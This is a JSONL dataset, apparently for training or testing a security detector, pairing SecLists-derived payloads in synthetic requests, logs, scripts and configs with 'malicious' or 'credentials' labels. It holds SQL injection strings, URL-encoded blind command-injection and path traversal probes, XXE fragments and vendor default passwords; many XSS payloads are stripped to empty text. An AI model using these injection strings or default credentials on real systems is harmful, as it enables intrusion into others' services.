{"id": "seclists_02899", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\n %dtd;]> ]]> ", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": " %dtd;]> ]]> ", "injection_type": "XXE"}}]}
{"id": "seclists_02900", "source": "seclists", "source_license": "MIT", "text": "\nAuthor Name: xs-sniper
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: xs-sniper", "injection_type": "XSS"}}]}
{"id": "seclists_02901", "source": "seclists", "source_license": "MIT", "text": "\nJavaScript Includes
\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "JavaScript Includes", "injection_type": "XSS"}}]}
{"id": "seclists_02902", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:epvjb6", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "epvjb6"}}]}
{"id": "seclists_02903", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C", "injection_type": "cmd"}}]}
{"id": "seclists_02904", "source": "seclists", "source_license": "MIT", "text": "password: aquarius\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "aquarius"}}]}
{"id": "seclists_02905", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:dogman@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "dogman"}}]}
{"id": "seclists_02906", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:U.S. Robotics,support,support,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "U.S. Robotics,support,support,"}}]}
{"id": "seclists_02907", "source": "seclists", "source_license": "MIT", "text": " \" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: ", "injection_type": "XSS"}}]}
{"id": "seclists_02908", "source": "seclists", "source_license": "MIT", "text": "\n\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "drag me
drop here ", "injection_type": "XSS"}}]}
{"id": "seclists_02909", "source": "seclists", "source_license": "MIT", "text": "filename=a)|id", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "a)|id", "injection_type": "cmd"}}]}
{"id": "seclists_02910", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = )) or benchmark(10000000,MD5(1))#", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ")) or benchmark(10000000,MD5(1))#", "injection_type": "SQL"}}]}
{"id": "seclists_02911", "source": "seclists", "source_license": "MIT", "text": "\nName contained XSS variant 1
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Name contained XSS variant 1", "injection_type": "XSS"}}]}
{"id": "seclists_02912", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = )) or sleep(__TIME__)='", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ")) or sleep(__TIME__)='", "injection_type": "SQL"}}]}
{"id": "seclists_02913", "source": "seclists", "source_license": "MIT", "text": "\n\n\n\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "", "injection_type": "SSI"}}]}
{"id": "seclists_02914", "source": "seclists", "source_license": "MIT", "text": "\n
\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": " ", "injection_type": "XSS"}}]}
{"id": "seclists_02915", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=or 1=1 /* HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 1=1 /*", "injection_type": "SQL"}}]}
{"id": "seclists_02916", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %0A%20str%3D%24%28echo%20IRXTAA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20IRXTAA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//", "injection_type": "cmd"}}]}
{"id": "seclists_02917", "source": "seclists", "source_license": "MIT", "text": "filename=%27%7Cecho$IFSZXEJNO$((10%2B18))$(echo$IFSZXEJNO)ZXEJNO%2F%2F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%7Cecho$IFSZXEJNO$((10%2B18))$(echo$IFSZXEJNO)ZXEJNO%2F%2F", "injection_type": "cmd"}}]}
{"id": "seclists_02918", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %7C%20%5B%201%20-ne%20%24%28echo%20QPUCUQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%201%20-ne%20%24%28echo%20QPUCUQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527", "injection_type": "cmd"}}]}
{"id": "seclists_02919", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf (", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "(", "injection_type": "cmd"}}]}
{"id": "seclists_02920", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Author Name: ha.ckers.org HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]}
{"id": "seclists_02921", "source": "seclists", "source_license": "MIT", "text": "filename=\\x3C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\x3C", "injection_type": "cmd"}}]}
{"id": "seclists_02922", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=test HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "test ", "injection_type": "XSS"}}]}
{"id": "seclists_02923", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = ' or 0=0 #", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or 0=0 #", "injection_type": "SQL"}}]}
{"id": "seclists_02924", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:72d5tn", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "72d5tn"}}]}
{"id": "seclists_02925", "source": "seclists", "source_license": "MIT", "text": "\n\n\n\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "", "injection_type": "SSI"}}]}
{"id": "seclists_02937", "source": "seclists", "source_license": "MIT", "text": " test\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "test ", "injection_type": "XSS"}}]}
{"id": "seclists_02938", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = (||6)", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "(||6)", "injection_type": "SQL"}}]}
{"id": "seclists_02939", "source": "seclists", "source_license": "MIT", "text": "\n
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": " ", "injection_type": "XSS"}}]}
{"id": "seclists_02940", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=PRINT HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "PRINT", "injection_type": "SQL"}}]}
{"id": "seclists_02941", "source": "seclists", "source_license": "MIT", "text": "password: Loglogic,toor,logapp,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Loglogic,toor,logapp,"}}]}
{"id": "seclists_02942", "source": "seclists", "source_license": "MIT", "text": "\nExploit Name: Super basic HTML breaker 2
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Super basic HTML breaker 2", "injection_type": "XSS"}}]}
{"id": "seclists_02943", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Basic single quoted attribute breaker HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Basic single quoted attribute breaker", "injection_type": "XSS"}}]}
{"id": "seclists_02944", "source": "seclists", "source_license": "MIT", "text": "\nExploit Tags: general, evil tags, obfuscated
\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, obfuscated", "injection_type": "XSS"}}]}
{"id": "seclists_02945", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'or 1=1--';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 1=1--", "injection_type": "SQL"}}]}
{"id": "seclists_02946", "source": "seclists", "source_license": "MIT", "text": " test\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "test ", "injection_type": "XSS"}}]}
{"id": "seclists_02947", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %20echo%20KHPIMN$((0%2B66))$(echo%20KHPIMN)KHPIMN//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%20echo%20KHPIMN$((0%2B66))$(echo%20KHPIMN)KHPIMN//", "injection_type": "cmd"}}]}
{"id": "seclists_02948", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:WAAV,admin,waav,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "WAAV,admin,waav,"}}]}
{"id": "seclists_02949", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\nx' or name()='username' or 'x'='y", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "x' or name()='username' or 'x'='y", "injection_type": "XXE"}}]}
{"id": "seclists_02950", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ?x=", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "?x=", "injection_type": "cmd"}}]}
{"id": "seclists_02951", "source": "seclists", "source_license": "MIT", "text": " ", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Self-contained XSS variant 5", "injection_type": "XSS"}}]}
{"id": "seclists_02952", "source": "seclists", "source_license": "MIT", "text": " ", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: top.__proto__._= alert", "injection_type": "XSS"}}]}
{"id": "seclists_02953", "source": "seclists", "source_license": "MIT", "text": "\n\n\n\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "", "injection_type": "SSI"}}]}
{"id": "seclists_02954", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=IBM,qsysopr,qsysopr,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "IBM,qsysopr,qsysopr,"}}]}
{"id": "seclists_02955", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=update HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "update", "injection_type": "SQL"}}]}
{"id": "seclists_02956", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \\00\\00", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\00\\00", "injection_type": "cmd"}}]}
{"id": "seclists_02957", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C", "injection_type": "cmd"}}]}
{"id": "seclists_02958", "source": "seclists", "source_license": "MIT", "text": "password: sinister\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "sinister"}}]}
{"id": "seclists_02959", "source": "seclists", "source_license": "MIT", "text": "password: Flowpoint,,password,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Flowpoint,,password,"}}]}
{"id": "seclists_02960", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ..%bg%qf", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "..%bg%qf", "injection_type": "cmd"}}]}
{"id": "seclists_02961", "source": "seclists", "source_license": "MIT", "text": " test\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "test ", "injection_type": "XSS"}}]}
{"id": "seclists_02962", "source": "seclists", "source_license": "MIT", "text": " ", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: JSON based obfuscated onload vector", "injection_type": "XSS"}}]}
{"id": "seclists_02963", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=or sleep(__TIME__)# HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or sleep(__TIME__)#", "injection_type": "SQL"}}]}
{"id": "seclists_02964", "source": "seclists", "source_license": "MIT", "text": " \" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "", "injection_type": "XSS"}}]}
{"id": "seclists_02965", "source": "seclists", "source_license": "MIT", "text": "filename=%22%0A%20str%3D%24%28echo%20GZRNZB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%0A%20str%3D%24%28echo%20GZRNZB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527", "injection_type": "cmd"}}]}
{"id": "seclists_02966", "source": "seclists", "source_license": "MIT", "text": "filename=%7C%20%5B%204%20-ne%20%24%28echo%20PCTUKX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%204%20-ne%20%24%28echo%20PCTUKX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27", "injection_type": "cmd"}}]}
{"id": "seclists_02967", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GFPZMF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GFPZMF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//", "injection_type": "cmd"}}]}
{"id": "seclists_02968", "source": "seclists", "source_license": "MIT", "text": "password: joung\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "joung"}}]}
{"id": "seclists_02969", "source": "seclists", "source_license": "MIT", "text": "GET /search?q= HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": " ", "injection_type": "XSS"}}]}
{"id": "seclists_02970", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EEDNGD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EEDNGD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C", "injection_type": "cmd"}}]}
{"id": "seclists_02971", "source": "seclists", "source_license": "MIT", "text": " ", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector creates an alert like message boy via Visual Basic Script", "injection_type": "XSS"}}]}
{"id": "seclists_02972", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = admin'or 1=1 or ''='", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin'or 1=1 or ''='", "injection_type": "SQL"}}]}
{"id": "seclists_02973", "source": "seclists", "source_license": "MIT", "text": "filename= ", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": " ", "injection_type": "cmd"}}]}
{"id": "seclists_02974", "source": "seclists", "source_license": "MIT", "text": "filename=%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJFZDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJFZDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C", "injection_type": "cmd"}}]}
{"id": "seclists_02975", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Verizon,admin,password,http://www22.verizon.com/Support/Residential/Internet/fiosinternet/networking/setup/vz9100em/124043.htm\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Verizon,admin,password,http://www22.verizon.com/Support/Residential/Internet/fiosinternet/networking/setup/vz9100em/124043.htm"}}]}
{"id": "seclists_02976", "source": "seclists", "source_license": "MIT", "text": "filename=\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\">", "injection_type": "cmd"}}]}
{"id": "seclists_02978", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=%3Cx onxxx=alert(1) HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3Cx onxxx=alert(1)", "injection_type": "XSS"}}]}
{"id": "seclists_02979", "source": "seclists", "source_license": "MIT", "text": "\n\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "", "injection_type": "XSS"}}]}
{"id": "seclists_02980", "source": "seclists", "source_license": "MIT", "text": "\n test
\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": " test", "injection_type": "XSS"}}]}
{"id": "seclists_02981", "source": "seclists", "source_license": "MIT", "text": "password: 3COM,security,security,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "3COM,security,security,"}}]}
{"id": "seclists_02982", "source": "seclists", "source_license": "MIT", "text": "\n
\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": " ", "injection_type": "XSS"}}]}
{"id": "seclists_02983", "source": "seclists", "source_license": "MIT", "text": "filename=2", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "2", "injection_type": "cmd"}}]}
{"id": "seclists_02984", "source": "seclists", "source_license": "MIT", "text": "filename=/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00", "injection_type": "cmd"}}]}
{"id": "seclists_02985", "source": "seclists", "source_license": "MIT", "text": "username=\u0018 or 1=1 --&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\u0018 or 1=1 --", "injection_type": "SQL"}}]}
{"id": "seclists_02986", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=admin\") or \"1\"=\"1\"# HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin\") or \"1\"=\"1\"#", "injection_type": "SQL"}}]}
{"id": "seclists_02987", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\n]>&foo; ", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "]>&foo; ", "injection_type": "XXE"}}]}
{"id": "seclists_02988", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=highway\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "highway"}}]}
{"id": "seclists_02989", "source": "seclists", "source_license": "MIT", "text": "\n\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "drag me
drop here ", "injection_type": "XSS"}}]}
{"id": "seclists_02990", "source": "seclists", "source_license": "MIT", "text": "filename=%22%7C%20%5B%209%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%7C%20%5B%209%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23", "injection_type": "cmd"}}]}
{"id": "seclists_02991", "source": "seclists", "source_license": "MIT", "text": "\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<", "injection_type": "cmd"}}]}
{"id": "seclists_03001", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \"%3Becho%20OFKRSW$((4%2B25))$(echo%20OFKRSW)OFKRSW\\", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"%3Becho%20OFKRSW$((4%2B25))$(echo%20OFKRSW)OFKRSW\\", "injection_type": "cmd"}}]}
{"id": "seclists_03002", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:pretty@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "pretty"}}]}
{"id": "seclists_03003", "source": "seclists", "source_license": "MIT", "text": " \" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "
", "injection_type": "XSS"}}]}
{"id": "seclists_03004", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:HP,,,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "HP,,,"}}]}
{"id": "seclists_03005", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=tetsuo\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "tetsuo"}}]}
{"id": "seclists_03006", "source": "seclists", "source_license": "MIT", "text": " \" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": " ", "injection_type": "XSS"}}]}
{"id": "seclists_03007", "source": "seclists", "source_license": "MIT", "text": "filename=%2527%7C%20%5B%208%20-ne%20%24%28echo%20YGEOKN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%7C%20%5B%208%20-ne%20%24%28echo%20YGEOKN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20", "injection_type": "cmd"}}]}
{"id": "seclists_03008", "source": "seclists", "source_license": "MIT", "text": "username=or 'unusual' = 'unusual'&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 'unusual' = 'unusual'", "injection_type": "SQL"}}]}
{"id": "seclists_03009", "source": "seclists", "source_license": "MIT", "text": "\nExploit Tags: general, html breaking, injection
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, html breaking, injection", "injection_type": "XSS"}}]}
{"id": "seclists_03010", "source": "seclists", "source_license": "MIT", "text": " \" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "